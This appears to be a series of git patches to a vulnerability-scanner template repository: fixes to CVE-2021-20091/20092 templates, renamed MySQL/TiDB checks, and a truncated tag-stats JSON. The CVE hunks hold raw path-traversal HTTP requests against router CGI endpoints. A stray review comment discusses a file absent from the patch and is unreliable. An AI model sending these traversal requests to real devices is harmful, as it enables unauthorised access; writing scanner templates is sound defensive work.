Date: Tue, 14 Sep 2021 01:22:44 +0530
Subject: [PATCH 256/339] misc update
---
 cves/2021/CVE-2021-20091.yaml | 2 +-
 cves/2021/CVE-2021-20092.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml
index 650be7cd88..95bdbe5501 100644
--- a/cves/2021/CVE-2021-20091.yaml
+++ b/cves/2021/CVE-2021-20091.yaml
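Review bot: The body matcher added to ibm-security-access-manager.yaml requires both `/mga/sps/authsvc/policy/forgot_username` and `/mga/sps/authsvc/policy/forgot_password` (`condition: and`), but whether that is an extra mandatory signal or merely an alternative depends on the `matchers-condition` of the enclosing `matchers:` list, which lies outside the hunk. If the list-level condition is `and`, appliances with self-service username/password recovery disabled would stop being detected even though the header matcher immediately above still fires; either confirm the list-level condition is `or`, or relax this matcher to `condition: or`. A short comment such as `# self-service policy links present on the default login page` would also record why these two paths were chosen.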
@@ -21,7 +21,7 @@ requests:
 - |
 GET /images/..%2finfo.html HTTP/1.1
 Host: {{Hostname}}
- Referer: {{{{BaseURL}}}}/info.html
+ Referer: {{BaseURL}}/info.html
 - |
 POST /images/..%2fapply_abstract.cgi HTTP/1.1
diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml
index 72246e7705..a84b883624 100644
--- a/cves/2021/CVE-2021-20092.yaml
+++ b/cves/2021/CVE-2021-20092.yaml
@@ -22,7 +22,7 @@ requests:
 - |
 GET /images/..%2finfo.html HTTP/1.1
 Host: {{Hostname}}
- Referer: {{{{BaseURL}}}}/info.html
+ Referer: {{BaseURL}}/info.html
 - |
 GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
From 8c92195fef525c588d8ebcc8e1c79fa862d92047 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 14 Sep 2021 01:54:21 +0530
Subject: [PATCH 257/339] misc update
---
 ...l-native-cred-bruteforce.yaml => mysql-native-password.yaml} | 2 +-
 ...ative-password-bruteforce.yaml => tidb-native-password.yaml} | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
 rename network/{mysql-native-cred-bruteforce.yaml => mysql-native-password.yaml} (91%)
 rename network/{tidb-native-password-bruteforce.yaml => tidb-native-password.yaml} (93%)
diff --git a/network/mysql-native-cred-bruteforce.yaml b/network/mysql-native-password.yaml
similarity index 91%
rename from network/mysql-native-cred-bruteforce.yaml
rename to network/mysql-native-password.yaml
index 213c71805a..3303abcd3b 100644
--- a/network/mysql-native-cred-bruteforce.yaml
+++ b/network/mysql-native-password.yaml
@@ -1,4 +1,4 @@
-id: mysql-native-password-bruteforce
+id: mysql-native-password
 info:
 name: MySQL DB with enabled native password
diff --git a/network/tidb-native-password-bruteforce.yaml b/network/tidb-native-password.yaml
similarity index 93%
rename from network/tidb-native-password-bruteforce.yaml
rename to network/tidb-native-password.yaml
index a72290581b..91aa175cb7 100644
--- a/network/tidb-native-password-bruteforce.yaml
+++ b/network/tidb-native-password.yaml
@@ -1,4 +1,4 @@
-id: tidb-native-password-bruteforce
+id: tidb-native-password
 info:
 name: TiDB DB with enabled native password
From 41d001ebb6051c79bc846dc7369e3132d1593370 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 13 Sep 2021 20:33:42 +0000
Subject: [PATCH 258/339] Auto Generated Templates Stats [Mon Sep 13 20:33:42 UTC 2021] :robot:
---
 TEMPLATES-STATS.json | 2 +-
 TEMPLATES-STATS.md | 1549 ++++++++++++++++++++++--------------------
 TOP-10.md | 20 +-
 3 files changed, 810 insertions(+), 761 deletions(-)
diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json
index 01a0ac282d..e295b164f1 100644
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
@@ -1 +1 @@ -{"tags":[{"name":"cve","count":666},{"name":"panel","count":236},{"name":"lfi","count":228},{"name":"xss","count":225},{"name":"exposure","count":221},{"name":"wordpress","count":206},{"name":"rce","count":193},{"name":"cve2020","count":159},{"name":"wp-plugin","count":139},{"name":"cve2021","count":112},{"name":"tech","count":111},{"name":"config","count":93},{"name":"cve2019","count":90},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":60},{"name":"joomla","count":59},{"name":"iot","count":58},{"name":"cve2010","count":51},{"name":"cve2017","count":49},{"name":"oob","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":39},{"name":"sqli","count":38},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"oracle","count":31},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"redirect","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":20},{"name":"disclosure","count":20},{"name":"router","count":19},{"name":"aem","count":19},{"name":"generic","count":19},{"name":"cisco","count":19},{"name":"sap","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":15},{"name":"cve2012","count":14},{"name":"misconfig","count":14},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2011","count":13},{"name":"adobe","count":13},{"name":"fuzz","count":13},{"name":"php","count":13},{"name":"devops","count":12},{"name":"weblogic","count":12},{"name":"jenkins","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"xxe","count":9},{"name":"magento","count":9},{"name":
"cnvd","count":8},{"name":"login","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"kubernetes","count":7},{"name":"nginx","count":7},{"name":"netgear","count":7},{"name":"files","count":7},{"name":"vmware","count":7},{"name":"google","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"dell","count":6},{"name":"confluence","count":6},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"drupal","count":5},{"name":"lucee","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"nodejs","count":5},{"name":"microsoft","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"thinkphp","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"glpi","count":4},{"name":"thinkcmf","count":4},{"name":"magmi","count":4},{"name":"jolokia","count":4},{"name":"firmware","count":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"vpn","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"wso2","count":4},{"name":"buffalo","count":4},{"name":"moodle","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"traversal","count":4},{"name":"deserialization","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"targa
","count":3},{"name":"bitrix","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"tikiwiki","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"nacos","count":3},{"name":"zabbix","count":3},{"name":"springcloud","count":3},{"name":"httpd","count":3},{"name":"kevinlab","count":3},{"name":"vbulletin","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"r-seenet","count":3},{"name":"mongodb","count":3},{"name":"git","count":3},{"name":"itop","count":3},{"name":"intrusive","count":3},{"name":"opensis","count":3},{"name":"resin","count":3},{"name":"kafka","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"ebs","count":3},{"name":"fanruan","count":3},{"name":"microstrategy","count":3},{"name":"log","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"cve2007","count":2},{"name":"sharepoint","count":2},{"name":"showdoc","count":2},{"name":"hjtcloud","count":2},{"name":"horde","count":2},{"name":"yapi","count":2},{"name":"prestashop","count":2},{"name":"github","count":2},{"name":"natshell","count":2},{"name":"linkerd","count":2},{"name":"chamilo","count":2},{"name":"dos","count":2},{"name":"npm","count":2},{"name":"emerge","count":2},{"name":"rstudio","count":2},{"name":"phpcollab","count":2},{"name":"strapi","count":2},{"name":"akamai","count":2},{"name":"spark","count":2},{"name":"shellshock","count":2},{"name":"smtp","count":2},{"name":"ucmdb","count":2},{"name":"splunk","count":2},{"name":"grav","count":2},{"name":"oauth","count":2},{"name":"rockethchat","count":2},{"name":"injection","count":2},{"name":"leak","count":2},{"name":"jellyfin","count":2},{"name":"saltstack","count":2},{"name":"sonicwall","count":2},{"name":"fortios","count":2},{"name":"igs","count":2},{"name":"prometheus","count":2},{"name":"trixbox","count":2
},{"name":"glassfish","count":2},{"name":"node","count":2},{"name":"keycloak","count":2},{"name":"huawei","count":2},{"name":"hashicorp","count":2},{"name":"ec2","count":2},{"name":"jeedom","count":2},{"name":"paloalto","count":2},{"name":"openfire","count":2},{"name":"icewarp","count":2},{"name":"azure","count":2},{"name":"telerik","count":2},{"name":"mida","count":2},{"name":"middleware","count":2},{"name":"proxy","count":2},{"name":"hasura","count":2},{"name":"service","count":2},{"name":"plesk","count":2},{"name":"voipmonitor","count":2},{"name":"odoo","count":2},{"name":"couchdb","count":2},{"name":"waf","count":2},{"name":"flir","count":2},{"name":"mail","count":2},{"name":"jsf","count":2},{"name":"status","count":2},{"name":"chiyu","count":2},{"name":"xxljob","count":2},{"name":"wordfence","count":2},{"name":"sonarqube","count":2},{"name":"kentico","count":2},{"name":"netis","count":2},{"name":"hoteldruid","count":2},{"name":"maian","count":2},{"name":"seeyon","count":2},{"name":"cve2005","count":2},{"name":"activemq","count":2},{"name":"bigip","count":2},{"name":"axis2","count":2},{"name":"geowebserver","count":2},{"name":"frp","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"backdoor","count":2},{"name":"jboss","count":2},{"name":"nagios","count":2},{"name":"vrealize","count":2},{"name":"nextjs","count":2},{"name":"ecology","count":2},{"name":"webcam","count":2},{"name":"dolibarr","count":2},{"name":"smb","count":2},{"name":"kibana","count":2},{"name":"openam","count":2},{"name":"axis","count":2},{"name":"firebase","count":2},{"name":"idrac","count":2},{"name":"mcafee","count":2},{"name":"rockmongo","count":2},{"name":"globalprotect","count":2},{"name":"hpe","count":2},{"name":"cache","count":2},{"name":"guacamole","count":2},{"name":"akkadian","count":2},{"name":"pcoip","count":1},{"name":"webmodule-ee","count":1},{"name":"expn","count":1},{"name":"pagespeed","count":1},{"name":"alibaba","count":1},{"name":"centos","count":1},{"n
ame":"bigbluebutton","count":1},{"name":"kubeflow","count":1},{"name":"landray","count":1},{"name":"clave","count":1},{"name":"kafdrop","count":1},{"name":"saltapi","count":1},{"name":"zarafa","count":1},{"name":"cve2006","count":1},{"name":"jfrog","count":1},{"name":"trilithic","count":1},{"name":"achecker","count":1},{"name":"tieline","count":1},{"name":"geddy","count":1},{"name":"graphite","count":1},{"name":"mantis","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"jnoj","count":1},{"name":"yachtcontrol","count":1},{"name":"clickhouse","count":1},{"name":"xunchi","count":1},{"name":"smartsense","count":1},{"name":"blue-ocean","count":1},{"name":"stem","count":1},{"name":"mirai","count":1},{"name":"sgp","count":1},{"name":"pgadmin","count":1},{"name":"hiawatha","count":1},{"name":"default","count":1},{"name":"gespage","count":1},{"name":"bedita","count":1},{"name":"vnc","count":1},{"name":"harbor","count":1},{"name":"webadmin","count":1},{"name":"haproxy","count":1},{"name":"opensmtpd","count":1},{"name":"upload","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"tapestry","count":1},{"name":"socomec","count":1},{"name":"adb","count":1},{"name":"rsyncd","count":1},{"name":"blackboard","count":1},{"name":"servicedesk","count":1},{"name":"logontracer","count":1},{"name":"chevereto","count":1},{"name":"moin","count":1},{"name":"mobileiron","count":1},{"name":"b2evolution","count":1},{"name":"jsp","count":1},{"name":"fedora","count":1},{"name":"pacsone","count":1},{"name":"nordex","count":1},{"name":"empirecms","count":1},{"name":"mpsec","count":1},{"name":"qsan","count":1},{"name":"uwsgi","count":1},{"name":"prtg","count":1},{"name":"parentlink","count":1},{"name":"jquery","count":1},{"name":"wiki","count":1},{"name":"spidercontrol","count":1},{"name":"fortiweb","count":1},{"name":"csod","count":1},{"name":"db","count":1},{"name":"duomicms","count":1},{"name":"tongda","count":1},{"name":"tracer","count":1}
,{"name":"phpfusion","count":1},{"name":"gogs","count":1},{"name":"argussurveillance","count":1},{"name":"avalanche","count":1},{"name":"sentry","count":1},{"name":"acexy","count":1},{"name":"fortigates","count":1},{"name":"emby","count":1},{"name":"tjws","count":1},{"name":"beanshell","count":1},{"name":"dvwa","count":1},{"name":"linkedin","count":1},{"name":"ssl","count":1},{"name":"cacti","count":1},{"name":"expose","count":1},{"name":"tensorflow","count":1},{"name":"discourse","count":1},{"name":"processmaker","count":1},{"name":"ioncube","count":1},{"name":"panabit","count":1},{"name":"tamronos","count":1},{"name":"codeigniter","count":1},{"name":"flash","count":1},{"name":"azkaban","count":1},{"name":"bullwark","count":1},{"name":"ilo","count":1},{"name":"extractor","count":1},{"name":"vidyo","count":1},{"name":"simplecrm","count":1},{"name":"netdata","count":1},{"name":"openx","count":1},{"name":"svn","count":1},{"name":"goahead","count":1},{"name":"owasp","count":1},{"name":"razor","count":1},{"name":"panos","count":1},{"name":"commax","count":1},{"name":"qcubed","count":1},{"name":"metinfo","count":1},{"name":"csrf","count":1},{"name":"proftpd","count":1},{"name":"nuxeo","count":1},{"name":"sage","count":1},{"name":"grails","count":1},{"name":"synnefo","count":1},{"name":"fastapi","count":1},{"name":"totaljs","count":1},{"name":"tpshop","count":1},{"name":"wazuh","count":1},{"name":"aura","count":1},{"name":"solarlog","count":1},{"name":"netsweeper","count":1},{"name":"netgenie","count":1},{"name":"xiuno","count":1},{"name":"phpinfo","count":1},{"name":"octoprint","count":1},{"name":"rfi","count":1},{"name":"ruckus","count":1},{"name":"exacqvision","count":1},{"name":"soar","count":1},{"name":"ecom","count":1},{"name":"postgres","count":1},{"name":"trane","count":1},{"name":"xvr","count":1},{"name":"kyan","count":1},{"name":"monitorr","count":1},{"name":"alertmanager","count":1},{"name":"bazarr","count":1},{"name":"dotnet","count":1},{"name":"lutron","count
":1},{"name":"ghost","count":1},{"name":"wavlink","count":1},{"name":"webui","count":1},{"name":"scs","count":1},{"name":"embedthis","count":1},{"name":"eyelock","count":1},{"name":"heroku","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"livezilla","count":1},{"name":"optiLink","count":1},{"name":"dnssec","count":1},{"name":"chinaunicom","count":1},{"name":"nsasg","count":1},{"name":"aruba","count":1},{"name":"lighttpd","count":1},{"name":"qvisdvr","count":1},{"name":"jmx","count":1},{"name":"qdpm","count":1},{"name":"lotuscms","count":1},{"name":"javamelody","count":1},{"name":"hadoop","count":1},{"name":"resourcespace","count":1},{"name":"discord","count":1},{"name":"myucms","count":1},{"name":"opencast","count":1},{"name":"cves2016","count":1},{"name":"ambari","count":1},{"name":"moinmoin","count":1},{"name":"wooyun","count":1},{"name":"eyou","count":1},{"name":"pippoint","count":1},{"name":"rmc","count":1},{"name":"ueditor","count":1},{"name":"sidekiq","count":1},{"name":"eprints","count":1},{"name":"bitly","count":1},{"name":"circontrol","count":1},{"name":"kong","count":1},{"name":"aspnuke","count":1},{"name":"faraday","count":1},{"name":"getsimple","count":1},{"name":"sceditor","count":1},{"name":"iceflow","count":1},{"name":"huijietong","count":1},{"name":"zmanda","count":1},{"name":"tika","count":1},{"name":"addpac","count":1},{"name":"openerp","count":1},{"name":"cors","count":1},{"name":"lansweeper","count":1},{"name":"swagger","count":1},{"name":"servicenow","count":1},{"name":"wamp","count":1},{"name":"emc","count":1},{"name":"ricoh","count":1},{"name":"openstack","count":1},{"name":"office365","count":1},{"name":"dbeaver","count":1},{"name":"centreon","count":1},{"name":"jenkin","count":1},{"name":"commscope","count":1},{"name":"lanproxy","count":1},{"name":"avtech","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"k8s","count":1},{"name":"triconsole","count":1},{"name
":"hiboss","count":1},{"name":"miscrsoft","count":1},{"name":"subrion","count":1},{"name":"payara","count":1},{"name":"druid","count":1},{"name":"wing-ftp","count":1},{"name":"gridx","count":1},{"name":"plastic","count":1},{"name":"ntopng","count":1},{"name":"appweb","count":1},{"name":"monitorix","count":1},{"name":"svnserve","count":1},{"name":"redwood","count":1},{"name":"websvn","count":1},{"name":"adminer","count":1},{"name":"skywalking","count":1},{"name":"cse","count":1},{"name":"ilo4","count":1},{"name":"camunda","count":1},{"name":"ems","count":1},{"name":"announcekit","count":1},{"name":"spip","count":1},{"name":"sourcebans","count":1},{"name":"wmt","count":1},{"name":"ewebs","count":1},{"name":"jenzabar","count":1},{"name":"memcached","count":1},{"name":"mysql","count":1},{"name":"lancom","count":1},{"name":"krweb","count":1},{"name":"blind","count":1},{"name":"xdcms","count":1},{"name":"arl","count":1},{"name":"wondercms","count":1},{"name":"webmin","count":1},{"name":"wildfly","count":1},{"name":"sar2html","count":1},{"name":"linksys","count":1},{"name":"iptime","count":1},{"name":"hortonworks","count":1},{"name":"perl","count":1},{"name":"exponentcms","count":1},{"name":"salesforce","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"gitlist","count":1},{"name":"tileserver","count":1},{"name":"turbocrm","count":1},{"name":"smi","count":1},{"name":"setup","count":1},{"name":"acontent","count":1},{"name":"craftcms","count":1},{"name":"mediumish","count":1},{"name":"robomongo","count":1},{"name":"magicflow","count":1},{"name":"clink-office","count":1},{"name":"openrestry","count":1},{"name":"plone","count":1},{"name":"landrayoa","count":1},{"name":"cocoon","count":1},{"name":"solman","count":1},{"name":"apiman","count":1},{"name":"keenetic","count":1},{"name":"zenario","count":1},{"name":"k8","count":1},{"name":"jitsi","count":1},{"name":"javascript","count":1},{"name":"timeclock","count":1},{"name":"opentsdb","count":1},{"name":"p
ortainer","count":1},{"name":"ns","count":1},{"name":"viewpoint","count":1},{"name":"rabbitmq","count":1},{"name":"webftp","count":1},{"name":"phalcon","count":1},{"name":"dom","count":1},{"name":"diris","count":1},{"name":"xml","count":1},{"name":"opm","count":1},{"name":"expressjs","count":1},{"name":"biometrics","count":1},{"name":"ssltls","count":1},{"name":"sitecore","count":1},{"name":"upnp","count":1},{"name":"zeroshell","count":1},{"name":"kerbynet","count":1},{"name":"jeewms","count":1},{"name":"influxdb","count":1},{"name":"wuzhicms","count":1},{"name":"selea","count":1},{"name":"enumeration","count":1},{"name":"nexusdb","count":1},{"name":"comodo","count":1},{"name":"concrete","count":1},{"name":"visualtools","count":1},{"name":"auth","count":1},{"name":"mautic","count":1},{"name":"woocomernce","count":1},{"name":"nuuo","count":1},{"name":"cyberoam","count":1},{"name":"email","count":1},{"name":"sco","count":1},{"name":"anchorcms","count":1},{"name":"st","count":1},{"name":"erp-nc","count":1},{"name":"redis","count":1},{"name":" 
default-login","count":1},{"name":"dvr","count":1},{"name":"zyxel","count":1},{"name":"octobercms","count":1},{"name":"favicon","count":1},{"name":"owa","count":1},{"name":"spring","count":1},{"name":"tectuus","count":1},{"name":"checkpoint","count":1},{"name":"redhat","count":1},{"name":"bolt","count":1},{"name":"cherokee","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"klog","count":1},{"name":"nedi","count":1},{"name":"timesheet","count":1},{"name":"plc","count":1},{"name":"nweb2fax","count":1},{"name":"camera","count":1},{"name":"maccmsv10","count":1},{"name":"fastcgi","count":1},{"name":"crm","count":1},{"name":"sophos","count":1},{"name":"bash","count":1},{"name":"nc2","count":1},{"name":"clockwatch","count":1},{"name":"viewlinc","count":1},{"name":"yealink","count":1},{"name":"labtech","count":1},{"name":"zte","count":1},{"name":"ruby","count":1},{"name":"sarg","count":1},{"name":"floc","count":1},{"name":"fuelcms","count":1},{"name":"pyramid","count":1},{"name":"cobub","count":1},{"name":"wavemaker","count":1},{"name":"2014","count":1},{"name":"cerebro","count":1},{"name":"scimono","count":1},{"name":"cgi","count":1},{"name":"netmask","count":1},{"name":"dotnetnuke","count":1},{"name":"interlib","count":1},{"name":"apos","count":1},{"name":"mongo","count":1},{"name":"circontrorl","count":1},{"name":"rdp","count":1},{"name":"liferay","count":1},{"name":"fortigate","count":1},{"name":"traefik","count":1},{"name":"twitter-server","count":1},{"name":"shopware","count":1},{"name":"majordomo2","count":1},{"name":"zcms","count":1},{"name":"meraki","count":1},{"name":"feifeicms","count":1},{"name":"mantisbt","count":1},{"name":"openemr","count":1},{"name":"geutebruck","count":1},{"name":"mara","count":1},{"name":"xff","count":1},{"name":"doh","count":1},{"name":"idemia","count":1},{"name":"realteo","count":1},{"name":"fortinet","count":1},{"name":"episerver","count":1},{"name":"sprintful","count":1},{"name":"esmtp","count":1},{"name":"linux
","count":1},{"name":"zookeeper","count":1},{"name":"bruteforce","count":1},{"name":"whm","count":1},{"name":"drone","count":1},{"name":"enum","count":1},{"name":"netrc","count":1},{"name":"glances","count":1},{"name":"javafaces","count":1},{"name":"zm","count":1},{"name":"mdb","count":1},{"name":"calendarix","count":1},{"name":"tensorboard","count":1},{"name":"finereport","count":1},{"name":"cofax","count":1},{"name":"couchbase","count":1},{"name":"dompdf","count":1},{"name":"phpunit","count":1},{"name":"seacms","count":1},{"name":"gloo","count":1},{"name":"bookstack","count":1},{"name":"rhymix","count":1},{"name":"rujjie","count":1},{"name":"dotclear","count":1},{"name":"gotmls","count":1},{"name":"mongoshake","count":1},{"name":"vsphere","count":1},{"name":"powercreator","count":1},{"name":"froxlor","count":1},{"name":"tenda","count":1},{"name":"lg-nas","count":1},{"name":"opensns","count":1},{"name":"pulsesecure","count":1},{"name":"flink","count":1},{"name":"cloudinary","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"postmessage","count":1},{"name":"weiphp","count":1},{"name":"sqlite","count":1},{"name":"codemeter","count":1},{"name":"vscode","count":1},{"name":"exposures","count":1},{"name":"visionhub","count":1},{"name":"h3c-imc","count":1},{"name":"oscommerce","count":1},{"name":"varnish","count":1},{"name":"nette","count":1},{"name":"thinkadmin","count":1},{"name":"htmli","count":1},{"name":"74cms","count":1},{"name":"darkstat","count":1},{"name":"ulterius","count":1},{"name":"spf","count":1},{"name":"mariadb","count":1},{"name":"gateone","count":1},{"name":"yii","count":1},{"name":"mailchimp","count":1},{"name":"clusterengine","count":1},{"name":"fiori","count":1},{"name":"szhe","count":1},{"name":"node-red-dashboard","count":1},{"name":"fortilogger","count":1},{"name":"alerta","count":1},{"name":"domxss","count":1},{"name":"spectracom","count":1},{"name":"oneblog","count":1},{"name":"shopxo","count":1},{"name":"nomad","count"
:1},{"name":"api-manager","count":1},{"name":"plugin","count":1},{"name":"manageengine","count":1},{"name":"acme","count":1},{"name":"cloudflare","count":1},{"name":"asus","count":1},{"name":"elascticsearch","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"accela","count":1},{"name":"sureline","count":1}],"authors":[{"name":"dhiyaneshdk","count":248},{"name":"pikpikcu","count":246},{"name":"pdteam","count":198},{"name":"daffainfo","count":183},{"name":"geeknik","count":150},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"pussycat0x","count":55},{"name":"princechaddha","count":55},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"0x_akoko","count":25},{"name":"organiccrap","count":24},{"name":"philippedelteil","count":21},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"nadino","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic 
(@tech)","count":7},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"meme-lord","count":6},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"xelkomy","count":4},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"lu4nx","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"fyoorer","count":3},{"name":"hahwul","count":2},{"name":"random-robbie","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"bp0lr","count":2},{"name":"foulenzer","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"vavkamil","count":2},{"name":"socketz","count":2},{"name":"davidmckennirey","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"moritz nentwig","count":2},{"name":"parth","count":2},{"name":"g4l1t0","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"nkxxkn","count":2},{"name":"0xelkomy","count":2},{"name":"hetroublemakr","count":2},{"name":"mahendra purbia 
(mah3sec_)","count":2},{"name":"arcc","count":2},{"name":"bsysop","count":2},{"name":"0xsapra","count":2},{"name":"x1m_martijn","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"huowuzhao","count":2},{"name":"0xcrypto","count":2},{"name":"swissky","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"gal nagli","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"sushantkamble","count":2},{"name":"johnjhacking","count":2},{"name":"alifathi-h1","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xrudra","count":2},{"name":"0xprial","count":2},{"name":"randomrobbie","count":2},{"name":"c3l3si4n","count":1},{"name":"rtcms","count":1},{"name":"hakluke","count":1},{"name":"un-fmunozs","count":1},{"name":"skeltavik","count":1},{"name":"52971","count":1},{"name":"_darrenmartyn","count":1},{"name":"zandros0","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"rodnt","count":1},{"name":"abison_binoy","count":1},{"name":"s1r1u5_","count":1},{"name":"izn0u","count":1},{"name":"makyotox","count":1},{"name":"dawid-czarnecki","count":1},{"name":"borna nematzadeh","count":1},{"name":"sy3omda","count":1},{"name":"flag007","count":1},{"name":"pratik khalane","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"yavolo","count":1},{"name":"yashanand155","count":1},{"name":"elder tao","count":1},{"name":"vzamanillo","count":1},{"name":"nytr0gen","count":1},{"name":"elmahdi","count":1},{"name":"shreyapohekar","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro 
